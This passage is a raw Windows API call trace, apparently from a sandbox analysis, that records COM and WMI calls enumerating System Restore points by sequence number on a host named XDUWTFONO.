out: puBuffLength=0x41ec70*=0x11, pszText=0x0) returned 0x0 [0116.589] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41ec70*=0x11, pszText="0000000000000000" | out: puBuffLength=0x41ec70*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0116.589] IWbemClassObject:Get (in: This=0x6732be0, wszName="sequencenumber", lFlags=0, pVal=0x41ec70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3527bbc*=0, plFlavor=0x3527bc0*=0 | out: pVal=0x41ec70*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4, varVal2=0x0), pType=0x3527bbc*=19, plFlavor=0x3527bc0*=0) returned 0x0 [0116.589] IWbemClassObject:Get (in: This=0x6732be0, wszName="sequencenumber", lFlags=0, pVal=0x41ec78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3527bbc*=19, plFlavor=0x3527bc0*=0 | out: pVal=0x41ec78*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4, varVal2=0x0), pType=0x3527bbc*=19, plFlavor=0x3527bc0*=0) returned 0x0 [0116.590] CoTaskMemAlloc (cb=0x4) returned 0x77dbc8 [0116.590] IEnumWbemClassObject:Next (in: This=0x6736ac4, lTimeout=-1, uCount=0x1, apObjects=0x77dbc8, puReturned=0x3526b58 | out: apObjects=0x77dbc8*=0x6732f20, puReturned=0x3526b58*=0x1) returned 0x0 [0116.598] IUnknown:QueryInterface (in: This=0x6732f20, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e2e0 | out: ppvObject=0x41e2e0*=0x6732f20) returned 0x0 [0116.599] IUnknown:QueryInterface (in: This=0x6732f20, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e29c | out: ppvObject=0x41e29c*=0x0) returned 0x80004002 [0116.599] IUnknown:QueryInterface (in: This=0x6732f20, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e0bc | out: ppvObject=0x41e0bc*=0x0) returned 0x80004002 [0116.599] IUnknown:AddRef (This=0x6732f20) returned 0x3 [0116.599] IUnknown:QueryInterface (in: This=0x6732f20, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dbfc | out: ppvObject=0x41dbfc*=0x0) returned 0x80004002 [0116.599] IUnknown:QueryInterface (in: This=0x6732f20, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41dbac | out: ppvObject=0x41dbac*=0x0) returned 0x80004002 [0116.599] IUnknown:QueryInterface (in: This=0x6732f20, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dbb8 | out: ppvObject=0x41dbb8*=0x6732f24) returned 0x0 [0116.599] IMarshal:GetUnmarshalClass (in: This=0x6732f24, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dbc0 | out: pCid=0x41dbc0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0116.599] IUnknown:Release (This=0x6732f24) returned 0x3 [0116.599] CoGetContextToken (in: pToken=0x41dc18 | out: pToken=0x41dc18) returned 0x0 [0116.599] CoGetContextToken (in: pToken=0x41e020 | out: pToken=0x41e020) returned 0x0 [0116.599] IUnknown:QueryInterface (in: This=0x6732f20, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e0b0 | out: ppvObject=0x41e0b0*=0x0) returned 0x80004002 [0116.599] IUnknown:Release (This=0x6732f20) returned 0x2 [0116.599] CoGetContextToken (in: pToken=0x41e5f0 | out: pToken=0x41e5f0) returned 0x0 [0116.599] CoGetContextToken (in: pToken=0x41e550 | out: pToken=0x41e550) returned 0x0 [0116.599] IUnknown:QueryInterface (in: This=0x6732f20, riid=0x41e620*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x41e61c | out: ppvObject=0x41e61c*=0x6732f20) returned 0x0 [0116.599] IUnknown:AddRef (This=0x6732f20) returned 0x4 [0116.599] IUnknown:Release (This=0x6732f20) returned 0x3 [0116.599] IUnknown:Release (This=0x6732f20) returned 0x2 [0116.599] CoTaskMemFree (pv=0x77dbc8) [0116.599] CoGetContextToken (in: pToken=0x41e958 | out: pToken=0x41e958) returned 0x0 [0116.599] IUnknown:AddRef (This=0x6732f20) returned 0x3 [0116.600] IWbemClassObject:Get (in: This=0x6732f20, wszName="__GENUS", lFlags=0, pVal=0x41ec6c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x41ecec*=0, plFlavor=0x41ece8*=0 | out: pVal=0x41ec6c*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x41ecec*=3, plFlavor=0x41ece8*=64) returned 0x0 [0116.600] IWbemClassObject:Get (in: This=0x6732f20, wszName="__PATH", lFlags=0, pVal=0x41ec50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x41ecd4*=0, plFlavor=0x41ecd0*=0 | out: pVal=0x41ec50*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=5", varVal2=0x0), pType=0x41ecd4*=8, plFlavor=0x41ecd0*=64) returned 0x0 [0116.600] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=5") returned 0x6e [0116.600] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=5") returned 0x6e [0116.600] CoGetObjectContext (in: riid=0x346e308*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41ec7c | out: ppv=0x41ec7c*=0x72015c) returned 0x0 [0116.600] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x41ec74 | out: pAptType=0x41ec74*=1) returned 0x0 [0116.600] IUnknown:QueryInterface (in: This=0x72015c, riid=0x346e2f0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x41ec78 | out: ppvObject=0x41ec78*=0x0) returned 0x80004002 [0116.600] IUnknown:Release (This=0x72015c) returned 0x1 [0116.601] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41e5e8 | out: ppv=0x41e5e8*=0x6736d98) returned 0x0 [0116.601] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736d98, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e800 | out: ppvObject=0x41e800*=0x0) returned 0x80004002 [0116.602] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736d98, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e814 | out: ppvObject=0x41e814*=0x6733180) returned 0x0 [0116.602] WbemDefPath:IUnknown:Release (This=0x6736d98) returned 0x0 [0116.602] WbemDefPath:IUnknown:QueryInterface (in: This=0x6733180, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e434 | out: ppvObject=0x41e434*=0x6733180) returned 0x0 [0116.602] WbemDefPath:IUnknown:QueryInterface (in: This=0x6733180, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e3f0 | out: ppvObject=0x41e3f0*=0x0) returned 0x80004002 [0116.602] WbemDefPath:IUnknown:AddRef (This=0x6733180) returned 0x3 [0116.602] WbemDefPath:IUnknown:QueryInterface (in: This=0x6733180, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dd4c | out: ppvObject=0x41dd4c*=0x0) returned 0x80004002 [0116.602] WbemDefPath:IUnknown:QueryInterface (in: This=0x6733180, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41dcfc | out: ppvObject=0x41dcfc*=0x0) returned 0x80004002 [0116.602] WbemDefPath:IUnknown:QueryInterface (in: This=0x6733180, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dd08 | out: ppvObject=0x41dd08*=0x77dbc8) returned 0x0 [0116.602] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77dbc8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dd10 | out: pCid=0x41dd10*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0116.602] WbemDefPath:IUnknown:Release (This=0x77dbc8) returned 0x3 [0116.602] CoGetContextToken (in: pToken=0x41dd68 | out: pToken=0x41dd68) returned 0x0 [0116.602] CoGetContextToken (in: pToken=0x41e170 | out: pToken=0x41e170) returned 0x0 [0116.602] WbemDefPath:IUnknown:QueryInterface (in: This=0x6733180, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e200 | out: ppvObject=0x41e200*=0x0) returned 0x80004002 [0116.603] WbemDefPath:IUnknown:Release (This=0x6733180) returned 0x2 [0116.603] WbemDefPath:IUnknown:Release (This=0x6733180) returned 0x1 [0116.603] CoGetContextToken (in: pToken=0x41eaf8 | out: pToken=0x41eaf8) returned 0x0 [0116.603] CoGetContextToken (in: pToken=0x41ea58 | out: pToken=0x41ea58) returned 0x0 [0116.603] WbemDefPath:IUnknown:QueryInterface (in: This=0x6733180, riid=0x41eb28*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x41eb24 | out: ppvObject=0x41eb24*=0x6733180) returned 0x0 [0116.603] WbemDefPath:IUnknown:AddRef (This=0x6733180) returned 0x3 [0116.603] WbemDefPath:IUnknown:Release (This=0x6733180) returned 0x2 [0116.603] WbemDefPath:IWbemPath:SetText (This=0x6733180, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=5") returned 0x0 [0116.603] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730c70, puCount=0x41eca8 | out: puCount=0x41eca8*=0x2) returned 0x0 [0116.603] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41eca4*=0x0, pszText=0x0 | out: puBuffLength=0x41eca4*=0x11, pszText=0x0) returned 0x0 [0116.603] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41eca4*=0x11, pszText="0000000000000000" | out: puBuffLength=0x41eca4*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0116.603] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730c70, puCount=0x41ec74 | out: puCount=0x41ec74*=0x2) returned 0x0 [0116.603] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41ec70*=0x0, pszText=0x0 | out: puBuffLength=0x41ec70*=0x11, pszText=0x0) returned 0x0 [0116.603] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41ec70*=0x11, pszText="0000000000000000" | out: puBuffLength=0x41ec70*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0116.603] IWbemClassObject:Get (in: This=0x6732f20, wszName="sequencenumber", lFlags=0, pVal=0x41ec70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3528404*=0, plFlavor=0x3528408*=0 | out: pVal=0x41ec70*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x5, varVal2=0x0), pType=0x3528404*=19, plFlavor=0x3528408*=0) returned 0x0 [0116.603] IWbemClassObject:Get (in: This=0x6732f20, wszName="sequencenumber", lFlags=0, pVal=0x41ec78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3528404*=19, plFlavor=0x3528408*=0 | out: pVal=0x41ec78*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x5, varVal2=0x0), pType=0x3528404*=19, plFlavor=0x3528408*=0) returned 0x0 [0116.603] CoTaskMemAlloc (cb=0x4) returned 0x77dc08 [0116.604] IEnumWbemClassObject:Next (in: This=0x6736ac4, lTimeout=-1, uCount=0x1, apObjects=0x77dc08, puReturned=0x3526b58 | out: apObjects=0x77dc08*=0x6737180, puReturned=0x3526b58*=0x1) returned 0x0 [0116.604] IUnknown:QueryInterface (in: This=0x6737180, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e2e0 | out: ppvObject=0x41e2e0*=0x6737180) returned 0x0 [0116.604] IUnknown:QueryInterface (in: This=0x6737180, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e29c | out: ppvObject=0x41e29c*=0x0) returned 0x80004002 [0116.604] IUnknown:QueryInterface (in: This=0x6737180, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e0bc | out: ppvObject=0x41e0bc*=0x0) returned 0x80004002 [0116.605] IUnknown:AddRef (This=0x6737180) returned 0x3 [0116.605] IUnknown:QueryInterface (in: This=0x6737180, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dbfc | out: ppvObject=0x41dbfc*=0x0) returned 0x80004002 [0116.605] IUnknown:QueryInterface (in: This=0x6737180, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41dbac | out: ppvObject=0x41dbac*=0x0) returned 0x80004002 [0116.605] IUnknown:QueryInterface (in: This=0x6737180, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dbb8 | out: ppvObject=0x41dbb8*=0x6737184) returned 0x0 [0116.605] IMarshal:GetUnmarshalClass (in: This=0x6737184, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dbc0 | out: pCid=0x41dbc0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0116.605] IUnknown:Release (This=0x6737184) returned 0x3 [0116.605] CoGetContextToken (in: pToken=0x41dc18 | out: pToken=0x41dc18) returned 0x0 [0116.605] CoGetContextToken (in: pToken=0x41e020 | out: pToken=0x41e020) returned 0x0 [0116.605] IUnknown:QueryInterface (in: This=0x6737180, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e0b0 | out: ppvObject=0x41e0b0*=0x0) returned 0x80004002 [0116.605] IUnknown:Release (This=0x6737180) returned 0x2 [0116.605] CoGetContextToken (in: pToken=0x41e5f0 | out: pToken=0x41e5f0) returned 0x0 [0116.605] CoGetContextToken (in: pToken=0x41e550 | out: pToken=0x41e550) returned 0x0 [0116.605] IUnknown:QueryInterface (in: This=0x6737180, riid=0x41e620*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x41e61c | out: ppvObject=0x41e61c*=0x6737180) returned 0x0 [0116.605] IUnknown:AddRef (This=0x6737180) returned 0x4 [0116.605] IUnknown:Release (This=0x6737180) returned 0x3 [0116.606] IUnknown:Release (This=0x6737180) returned 0x2 [0116.606] CoTaskMemFree (pv=0x77dc08) [0116.606] CoGetContextToken (in: pToken=0x41e958 | out: pToken=0x41e958) returned 0x0 [0116.606] IUnknown:AddRef (This=0x6737180) returned 0x3 [0116.606] IWbemClassObject:Get (in: This=0x6737180, wszName="__GENUS", lFlags=0, pVal=0x41ec6c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x41ecec*=0, plFlavor=0x41ece8*=0 | out: pVal=0x41ec6c*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x41ecec*=3, plFlavor=0x41ece8*=64) returned 0x0 [0116.606] IWbemClassObject:Get (in: This=0x6737180, wszName="__PATH", lFlags=0, pVal=0x41ec50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x41ecd4*=0, plFlavor=0x41ecd0*=0 | out: pVal=0x41ec50*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=6", varVal2=0x0), pType=0x41ecd4*=8, plFlavor=0x41ecd0*=64) returned 0x0 [0116.606] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=6") returned 0x6e [0116.606] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=6") returned 0x6e [0116.606] CoGetObjectContext (in: riid=0x346e308*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41ec7c | out: ppv=0x41ec7c*=0x72015c) returned 0x0 [0116.606] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x41ec74 | out: pAptType=0x41ec74*=1) returned 0x0 [0116.606] IUnknown:QueryInterface (in: This=0x72015c, riid=0x346e2f0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x41ec78 | out: ppvObject=0x41ec78*=0x0) returned 0x80004002 [0116.607] IUnknown:Release (This=0x72015c) returned 0x1 [0116.607] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41e5e8 | out: ppv=0x41e5e8*=0x6736da8) returned 0x0 [0116.608] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736da8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e800 | out: ppvObject=0x41e800*=0x0) returned 0x80004002 [0116.608] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736da8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e814 | out: ppvObject=0x41e814*=0x6737718) returned 0x0 [0116.608] WbemDefPath:IUnknown:Release (This=0x6736da8) returned 0x0 [0116.608] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737718, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e434 | out: ppvObject=0x41e434*=0x6737718) returned 0x0 [0116.608] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737718, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e3f0 | out: ppvObject=0x41e3f0*=0x0) returned 0x80004002 [0116.608] WbemDefPath:IUnknown:AddRef (This=0x6737718) returned 0x3 [0116.608] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737718, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dd4c | out: ppvObject=0x41dd4c*=0x0) returned 0x80004002 [0116.608] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737718, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41dcfc | out: ppvObject=0x41dcfc*=0x0) returned 0x80004002 [0116.608] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737718, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dd08 | out: ppvObject=0x41dd08*=0x77dc08) returned 0x0 [0116.608] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77dc08, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dd10 | out: pCid=0x41dd10*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0116.608] WbemDefPath:IUnknown:Release (This=0x77dc08) returned 0x3 [0116.608] CoGetContextToken (in: pToken=0x41dd68 | out: pToken=0x41dd68) returned 0x0 [0116.608] CoGetContextToken (in: pToken=0x41e170 | out: pToken=0x41e170) returned 0x0 [0116.608] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737718, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e200 | out: ppvObject=0x41e200*=0x0) returned 0x80004002 [0116.609] WbemDefPath:IUnknown:Release (This=0x6737718) returned 0x2 [0116.609] WbemDefPath:IUnknown:Release (This=0x6737718) returned 0x1 [0116.609] CoGetContextToken (in: pToken=0x41eaf8 | out: pToken=0x41eaf8) returned 0x0 [0116.609] CoGetContextToken (in: pToken=0x41ea58 | out: pToken=0x41ea58) returned 0x0 [0116.609] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737718, riid=0x41eb28*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x41eb24 | out: ppvObject=0x41eb24*=0x6737718) returned 0x0 [0116.609] WbemDefPath:IUnknown:AddRef (This=0x6737718) returned 0x3 [0116.609] WbemDefPath:IUnknown:Release (This=0x6737718) returned 0x2 [0116.609] WbemDefPath:IWbemPath:SetText (This=0x6737718, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=6") returned 0x0 [0116.609] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730c70, puCount=0x41eca8 | out: puCount=0x41eca8*=0x2) returned 0x0 [0116.609] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41eca4*=0x0, pszText=0x0 | out: puBuffLength=0x41eca4*=0x11, pszText=0x0) returned 0x0 [0116.610] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, 